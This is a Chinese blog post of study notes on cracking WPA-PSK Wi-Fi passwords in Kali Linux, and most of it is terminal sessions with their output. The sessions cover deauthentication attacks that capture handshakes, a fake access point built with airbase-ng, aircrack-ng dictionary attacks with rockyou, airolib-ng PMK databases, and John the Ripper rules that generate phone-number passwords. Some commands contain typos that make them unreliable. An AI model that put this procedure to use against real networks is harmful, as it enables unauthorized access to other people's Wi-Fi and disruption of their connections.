WPA攻击

最新推荐文章于 2024-07-04 13:39:48 发布
最新推荐文章于 2024-07-04 13:39:48 发布
阅读量664 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37759106/article/details/79379414
版权

WPA PSK攻击                    

   只有一种密码破解方法           

       WPA不存在WEP的弱点         

   只能暴力破解                   

       CPU资源                    

       时间                       

       字典质量                   

           网上共享的字典         

           泄露密码               

           地区电话号码段         

           Crunch生成字典         

           kali中自带的字典文件

WPA PSK攻击                                 

    PSK破解过程                                 

        启动monitor                             

        开始抓包并保存                          

        Deauthentication攻击获取4步握手信息    

        使用字典暴力破解

root@kali:~# service network-manager stop

root@kali:~# airmon-ng check kill
Killing these processes:

  FID NAME
  989 wpa_supplicant
 1025 dhclient

root@kali:~# airmon-ng start wlan0
NO interfering processes found

PHY     Interface       Driver            Chipest

phy0    wlan2           ath9k_htc        Atheros Communications, Inc, AR9271 802.11n
                (mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
                (mac80211 station mode vif disabled for [phy0]wlan2)

root@kali:~# iwconfig
eth0      no wireless extensions

wlan0mon  IEEE 802.11bgn  Mode:Monitor Frequency:2.57 GHz   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off    Fragment thr:off
          Power Management:off

lo        no wireless extensions.

root@kali:~# airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon --bssid EC:25:CA:DC:29:B6 -c 11 -w wpa

root@kali:~# airoplay-ng -0 2 -a EC:25:CA:DC:29:B6 -c 50:3E:34:30:0F:AA wlan0mon

root@kali:~# ls
wpa-01.cap   wpa-01.csv    wap-01.kismet.csv    wpawap-01.kismet.netxml

root@kali:~# ls wpa*
wpa-01.cap   wpa-01.csv    wap-01.kismet.csv    wpawap-01.kismet.netxml

root@kali:~# cd /usr/share/john/   字典目录

root@kali:/usr/share/john# ls password.list

root@kali:/usr/share/john# more password.list

root@kali:/usr/share/john# grep Password password.list
Password

root@kali:~# aircrack-ng -w /usr/share/john/password.list wpa-01.cap
密码是Password

root@kali:~# cd /usr/share/wfuzz/wordlist/
fuzzdb/    general/    Injections/    others/    stress/    vulns/    webservicces/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/
attack-playloads/      dbcs/        web-backdoors/        wordlists-user-passwd/
Discovery/             regex/       wordlists-misc/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-
wordlists-misc/         wordlists-user-passwd/

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# ls
common-http-ports.txt  us_cities.txt  wordlist-alpharumeric-case.txt  wordlist-common-snmp-community-strings.txt wordlist-dns.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat common-http-ports.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat us_cities.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cd ..

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/#cd wordlists-user-passwd/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd# cd passwd/

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# ls
john.txt    phpbb.txt    twltter.txt woksauce.txt

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat john.txt | wc -l

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat phpbb.txt | wc -l

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# aircrack-ng -w phpbb.txt /root/wpa-01.cap

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cd

root@kali:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#

root@kali:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#

root@kali:~# cd /usr/share/

root@kali:/usr/share# ls

root@kali:/usr/share# cd wordlists/

root@kali:/usr/share/wordlists# ls
dirb    dirbuster    dnsmap.txt    Fasttrack.txt    fern-wifi    metasploit   metasploit-jtr    namp.lst   rockyou.txt.gz    sqlmap.txt    termineter.txt wfuzz

root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l
-rw-r--r-- 1 root root 53357341 3月    3  2013 rockyou.txt.gz

root@kali:/usr/share/wordlists# ls rockyou.txt.gz -l -h
-rw-r--r-- 1 root root 51M 3月    3  2013 rockyou.txt.gz

root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz

root@kali:/usr/share/wordlists# ls
dirb   dirbuster   dnsmap.txt    fasttrack.txt   fern-wifi    metasploit    metasploit-jtr    nmap.lst   rockyou.txt    sqlmap.txt    terminter.txt    wfuzz

root@kali:/usr/share/wordlists# cat rockyou.txt | wc -l
14344392

root@kali:/usr/share/wordlists#
aircrack-ng -w rockyou.txt /root/wpa-01.cap
密码是password

root@kali:~# airodump-ng --essid kifi wlan0mon

root@kali:~# airodump-ng --bssid EC:26:CA:DC:29:B5 -c 11 wlan0monn -w wpa

root@kali:~# ls
wpa-01.cap   wpa-01.csv    wap-01.kismet.csv    wpawap-01.kismet.netxml    wpa-02.cap   wpa-02.csv    wap-02.kismet.csv    wpawap-02.kismet.netxml

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap

root@kali:~# grep Password135 /usr/share/wordlists/rockyou.txt

     WPA PSK攻击                                  

     AP情况下的WPA密码破解                      

         启动monitor                              

         开始抓包并保存                           

         根据probe信息伪造相同ESSIDAP           

         抓取四步握手中的前两个包                 

         使用字典暴力破解     

root@kali:~# airodump-ng wlan0mon

root@kali:~# rm wpa-01.*

root@kali:~# airodump-ng wlan0man

root@kali:~# airbase-ng -h
sage: airbase-ng <options> <replay interface>

Options

    -a bssid : set Access Point MAC address
    -i iface : capture packets from this interface
    -w WEP key : use this WEP key to encrypt/decrypt packets
    -h MAC : source mac for MITM mode
    -f disallow : disallow specified client MACs (default: allow)
    -W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
    -q : quiet (do not print statistics)
    -v : verbose (print more messages) (long --verbose)
    -M : M-I-T-M between [specified] clients and bssids (NOT CURRENTLY IMPLEMENTED)
    -A : Ad-Hoc Mode (allows other clients to peer) (long --ad-hoc)
    -Y in|out|both : external packet processing
    -c channel : sets the channel the AP is running on
    -X : hidden ESSID (long --hidden)
    -s : force shared key authentication
    -S : set shared key challenge length (default: 128)
    -L : Caffe-Latte attack (long --caffe-latte)
    -N : Hirte attack (cfrag attack), creates arp request against wep client (long –cfrag)
    -x nbpps : number of packets per second (default: 100)
    -y : disables responses to broadcast probes
    -0 : set all WPA,WEP,open tags. can't be used with -z & -Z
    -z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
    -Z type : same as -z, but for WPA2
    -V type : fake EAPOL 1=MD5 2=SHA1 3=auto
    -F prefix : write all sent and received frames into pcap file
    -P : respond to all probes, even when specifying ESSIDs
    -I interval : sets the beacon interval value in ms
    -C seconds : enables beaconing of probed ESSID values (requires -P)

Filter options:

    --bssid <MAC> : BSSID to filter/use (short -b)
    --bssids <file> : read a list of BSSIDs out of that file (short -B)
    --client <MAC> : MAC of client to accept (short -d)
    --clients <file> : read a list of MACs out of that file (short -D)
    --essid <ESSID> : specify a single ESSID (short -e)
    --essids <file> : read a list of ESSIDs out of that file (short -E)

Help:

    --help: Displays the usage screen (short -H)

root@kali:~# airbase-ng --essid lcon -c 11 wlan0mon    //伪装AP
18:44:04  Created tap interface at0
18:44:04  Trying to set MTU on at0 to 1500
18:44:04  Trying to set MTU on wlan0mon to 1800
18:44:04  Access point with DSSID C8:3A:35:CA:46:91 started.

root@kali:~# tnux    //分屏

root@kali:~# airbase --essid kifi -c 11 wlan0mon

root@kali:~# airbase --essid kifi -c 11 -z 2 wlan0mon

root@kali:~# airbase --essid kifi -c 11 -Z 4 wlan0mon

root@kali:~# airodump-ng wlan0mon

root@kali:~# airodump-ng wlan0mon --essid kifi

root@kali:~# airodump-ng wlan0mon --essid kifi -w wpa

root@kali:~# airodump-ng wlan0mon --essid kifi -w wpa -c 11

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-0
wpa-01.cap   wpa-01.csv    wap-01.kismet.csv    wpawap-01.kismet.netxml    wpa-02.cap   wpa-02.csv    wap-02.kismet.csv    wpawap-02.kismet.netxml

root@kali:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap

      AIROLIB破解密码                                               

      设计用于存储ESSID和密码列表                                   

          计算生成不变的PMK(计算资源消耗型)                       

          PMK在破解阶段被用于计算PTK(速度快,计算资源要求少)      

          通过完整性摘要值破解密码                                  

          SQLlite3数据库存储数据

       AIROLIB破解密码                                

       echo kifi > essid.txt                          

       airolib-ng db --import essid essid.txt         

       airolib-ng db --stats                          

       airolib-ng db --import passwd <wordlist>       

           自动剔除不合格的WPA字典                    

       airolib-ng db --batch                          

           生成PMK                                    

       aircrack-ng -r db wpa.cap                      

root@kali:~# echo kifi > essid.txt

root@kali:~# cat essid.txt
kifi

root@kali:~# airolib-ng db --import essid essid.txt

root@kali:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)

ESSID   Priority    Done
kifi    64      (null)

root@kali:~# airolib-ng db --import passwd /usr/share/wordlists/rockyou.txt

root@kali:~# airolib-ng db --import passwd /usr/share/john/passwrod.lst

root@kali:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)

ESSID   Priority    Done
kifi    64      0.0

root@kali:~# airolib-ng --batch
Computed 652 PNK in 14 soconds (46 PMK/s, 0 in buffer). ALL ESSID processod.

root@kali:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets

    #  BSSID              ESSID                     Encryption

    1  C8:3A:35:CA:46:91  kifi                      WPA (1 handshake)

Choosing first network as target.

Opening wpa-02.cap
Reading packetsm, please wait...

                                 Aircack-ng 1.2 rc2

root@kali:~# cat /usr/share/wordlists/rockyou.txt | head -n 200000 > dict.txt

root@kali:~# more dict.txt

root@kali:~# airolib-ng db --import password dict.txt
Reading file
Writing...as read,121538 invalid lines ignored.
Done

root@kali:~# airolib-ng db --batch

        JTR破解密码                                         

        John the ripper                                     

            快速的密码破解软件                              

            支持基于规则扩展密码字典                        

        很多人系统用书记号码做无线密码                      

            获取号段并利用JTR规则增加最后几位的数字        

        配置文件/etc/john/john.conf                         

            [list.Rules:Wordlist]                           

            $[0-9]$[0-9]$[0-9]

root@kali:~# gedit

root@kali:~# top    //系统的性能

root@kali:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets

    #  BSSID              ESSID                     Encryption

    1  C8:3A:35:CA:46:91  kifi                      WPA (1 handshake)

Choosing first network as target.

Opening wpa-02.cap
Reading packetsm, please wait...

                                 Aircack-ng 1.2 rc2

root@kali:~# cat yd.txt

root@kali:~# vi /etc/john/john.conf
/list.Rules:Wordlist
在最后加上密码规则
$[0-9]$[0-9]$[0-9]

         JTR破解密码                                                                      

         测试效果                                                                          

             john --wordlist=passwrod.list --rules --stdout | grep -i Password123                   

         破解调用                                                                          

             john --wroldlist=pass.list --rules --stdout | aricrack-ng -e kifi -w - wap.cap         

         北京联通手机号密码破解

root@kali:~# john --wordlist=yd.txt --rules --stdout

root@kali:~# ls yd.txt -lh
-rw-r--r-- 1 root root 561 11月 10 19:57 yd.txt

root@kali:~# john --wroldlist=yd.txt --rules --stdout | aricrack-ng -e kifi -w - wap02.cap

kalibiubiubiu
关注
【安全牛学习笔记】WPA攻击
edu_aqniu的博客
09-22 1467
WPA PSK攻击                        只有一种密码破解方法                   WPA不存在WEP的弱点             只能暴力破解                           CPU资源                            时间                               字典质量  
Kali linux 学习笔记(三十四)无线渗透——WPA攻击(PSK破解、AIROLIB、JTR、cowpatty、pyrit) 2020.3.13
闵行小鱼塘
03-13 1163
本节学习对WPA攻击,主要有PSK破解、AIROLIB、JTR、cowpatty、pyrit
WPA-Attack:WPA 攻击 - 通过键入一个命令轻松破坏 WPA WPA2 网络
05-30
WPA攻击 这是什么 ? 非常简单的脚本,可用于破解 WPA 网络密码。 如何使用 ? 您要做的就是键入以下命令: ./WPA-Attack -b [BSSID] -c [CHANNEL] -w [WORDLIST_FILE] 选项说明: [BSSID] 是目标的 MAC 地址 [CHANNEL]是网络频道 [WORDLIST_FILE] 是一个包含你想用来破解密码的字典的文件 可选参数: -s [SPOOFED_MAC] 是将使用的 MAC 地址,而不是原始 WiFi 卡的 MAC -h 仅用于抓取握手,不要尝试使用aircrack-ng破解密码, 所以如果你愿意,你可以稍后破解它,并且捕获的握手也会存储在./airodump_logs目录中 例子 没有欺骗MAC(使用您卡的原始MAC ): ./WPA-Attack -b AA:BB:CC:DD:EE:FF -c 11
无线渗透-WPA攻击
分享学习网络的点点滴滴
07-05 221
只有一种密码破解方法WPA不存在WEP的弱点只能暴力破解网上共享的字典泄露密码地区电话号码段Crunch生成字段Kali中自带的字典文件CPU资源时间字典质量启动monitor(之前讲过略)开启抓包并保存(之前讲过略)Deauthentication 攻击获取4步握手信息(之前讲过略)使用字段暴力破解kali自带的字典: 启动monitor开始抓包并保存根据probe信息伪造相同ESSID的AP抓取四部握手中的前两个包使用字典暴力破解使用的原理就是终端会去寻找AP,但是此AP可能在现存环境不存在,我们可以伪
Wi-Fi四种安全协议 - WEP、WPAWPA2、WPA3,看完秒懂
最新发布
redparrot2008的博客
07-04 1248
利用PSK以及无线网络的SSID,使用PBKDF2算法可以计算出PMK,利用PMK,以及认证过程中传输的ANonce、SNonce、STA的MAC地址、AP的MAC地址,使用hmac sha1算法可以计算出PTK。在数字化时代的今天,Wi-Fi安全协议扮演着非常重要的角色,它将保护着我们的日常隐私和数据被窃听,WEP、WPA2、WPA3在我们的日常生活中经常听到,不管是wifi研发者还是无线爱好者都应该有所了解。动态密钥生成:TKIP 为每个数据包生成一个独立的加密密钥,减少了密钥被破解的可能性。
无线***笔记(一)-《***WPA-PSK加密无线网络》
weixin_34074740的博客
04-29 97
这篇文章问什么技术含量,因为东哥记性不好,目的是为了记录一下命令,大家凑合看看不要当真。本教程只作为学习研究之用,不能用于非法用途!!!首先开启无线网卡混杂模式,wlan1是东哥支持蹭网的便携神器,之前文章有介绍。airmon-ngstartwlan1然后看看周围存在的热点,觊觎邻居家的无线网络很久了:)airodump-ngmon1然后开始监听目标网络,通过-...
网络安全攻防实验:WPA-PSK口令攻击
Floatremote的博客
11-11 2206
1) 掌握WLAN的工作原理;2) 理解RSN的密钥层次;3) 理解4次握手原理。
攻击WPA2的最新手法 突显用户的安全风险
mondy1989的博客
08-09 550
去年底爆发了WPA2协议漏洞及KRACK攻击工具后震惊科技及资安业界。如今又有安全研究人员发现新种骇入WPA2的手法,可以更快骇入破解Wi-Fi网络密码,进而窃听内容、绑架联机或发动攻击。 研究人员Jens Steube以atom为名在论坛网站Hashcat上发表其发现。他是在研究今年6月公布WPA3标准时意外发现到这项新攻击手法。 WPA 3增加诸多防护,包括SAE (Simultane...
WPA3认证分析.pdf
01-12
此外,WPA3还加强了开放网络的隐私保护,即使在不安全的公共网络环境下,也能防止恶意用户的嗅探攻击。 总结来说,WPA3认证增强了Wi-Fi网络的安全性,通过分析管理帧中的参数,我们可以准确识别AP支持的认证方式和...
WPA-master_wpa算法matlab_狼群_wpa_
09-29
标题中的"WPA-master_wpa算法matlab_狼群_wpa_"揭示了本次讨论的主题,主要集中在WPA(Wi-Fi Protected Access)算法的实现上,利用MATLAB编程语言,并结合了狼群优化算法(Wolf Pack Algorithm, WPA)的概念。...
WPA/WPA2加密高速破解的真相
03-02
对于无线WPA加密环境,在获得了WPA握手验证包后,攻击者会通过暴力破解模式来进行WPA密码破解,同时也可以通过事先建立有针对性的字典,然后再进行字典破解(攻击)。对于大多数无线接入点AP而言,这将会是个行之有效...
WPA简介
weixin_33948416的博客
11-11 1093
摘选自 https://www.sohu.com/a/199641521_683126 WPA 全名 WI-FI Protected Access, 有WPAWPA2两个标准,是一种保护无线网络的安全协议。WPA实现了IEEE802.11i标准的大部分,是在802.11i完备之前替代WEP的过度方案,后被WPA2取代。由于WPAWPA2都是基于802.11i,因此在技术层面几乎是相同的。主...
WPA在计算机英语中什么意思,Wi-Fi保护接入(WPA)是什么意思?(图)
weixin_39706861的博客
06-15 4240
Wi-Fi保护访问(WPA)是一种协议和算法,可以提高WEP使用的密钥的安全性。它更改了密钥生成方法,更频繁地更改了密钥以获得安全性,并增加了消息完整性检查功能以防止数据包伪造。 WPA的功能是替代WEP(有线等效保密)协议。过去的无线局域网不是很安全,因为标准加密技术“ WEP”存在一些缺陷。WPA是一种新技术,它继承了WEP的基本原理并解决了WEP的缺点。由于增强了用于生成加密密钥的算法,因此...
Wlan安全——认证与加密方式(WPA/WPA2)
m0_49864110的博客
08-18 9708
无线网络存在的安全隐患数据没有加密无线数据是在空气中传播,任何个人都可以通过空口抓包网卡截获到数据,导致信息泄露没有接入认证所有终端都可以连接到无线信号,然后去访问有线网络,进行攻击非法AP接入STA连接到非法AP,数据被窃取可以通过WIDS、WIPS来反制AP(后续讲解)
网络安全入门笔记(共327页),助你步入安全门槛
Spontaneous_0的博客
01-31 470
网络安全入门笔记(共327页),助你步入安全门槛
无线局域网安全协议(WEP、WPA、WAPI)
热门推荐
Hardworking666的博客
11-04 1万+
文章目录一、WEP(有线等效保密)二、WPA(Wi-Fi网络安全接入)三、WAPI(无线局域网鉴别和保密基础结构) WLAN是Wireless Local Area Network的简称,指应用无线通信技术将计算机设备互联起来,构成可以互相通信和实现资源共享的网络体系。 一、WEP(有线等效保密) WEP是Wired Equivalent Privacy的简称,有线等效保密(WEP)协议是对在两台设备间无线传输的数据进行加密的方式,用以防止非法用户窃听或侵入无线网络。不过密码分析学家已经找出 WEP 好..
四种Wi-Fi安全协议:WEP、WPAWPA2、WPA3,看完秒懂!
网络技术联盟站
04-28 5528
Wi-Fi安全协议密钥管理方法加密长度使用的协议WEP静态密钥64位或128位WPA动态密钥128位WPA2动态密钥128位或256位使用CCMP(Counter Mode with Cipher Block Chaining Message Authentication Code Protocol)的AES(高级加密标准)WPA3动态密钥(唯一密钥,个性化数据加密)192位和256位使用SAE(同时身份验证)的GCM(Galois-Counter Mode)
DOS攻击工具介绍
frankwhere的博客
03-24 7226
DoS(Denial Of Service)攻击是指故意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源, 目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃 然而随着网络上免费的可用DDoS工具增多,DoS攻击也日益增长,下面介绍几款Hacker常用的DoS攻击工具。 特别提示:仅用于攻防演练及教学测试用途,禁止非法使用。 1、卢瓦(LO...
Wifi通信协议:WEP,WPAWPA2,WPA3,WPS
unravel_tom的博客
06-16 3657
无线安全性是保护互联网安全的重要因素。连接到安全性低的无线网络可能会带来安全风险,包括数据泄露、账号被盗以及恶意软件的安装。因此,利用合适的Wi-Fi安全措施是非常重要的,了解WEP、WPAWPA2和WPA3等各种无线加密标准的区别也是至关重要的。 WPA(Wi-Fi Protected Access)是用于保护无线网络连接的计算设备内部的安全标准。它由Wi-Fi联盟开发,用来替代原先的无线安全标准WEP(Wired Equivalent Privacy),并在数据加密和用户认证方面表现优越。
wpa-psk口令攻击实验
05-13
WPA-PSK口令攻击实验是一种测试WPA-PSK Wi-Fi网络安全性的方法。WPA-PSK是一种Wi-Fi认证协议,使用预共享口令(PSK)实现认证和加密。攻击者可以通过猜测口令的方式来获取网络访问权限。 在实验中,攻击者需要使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值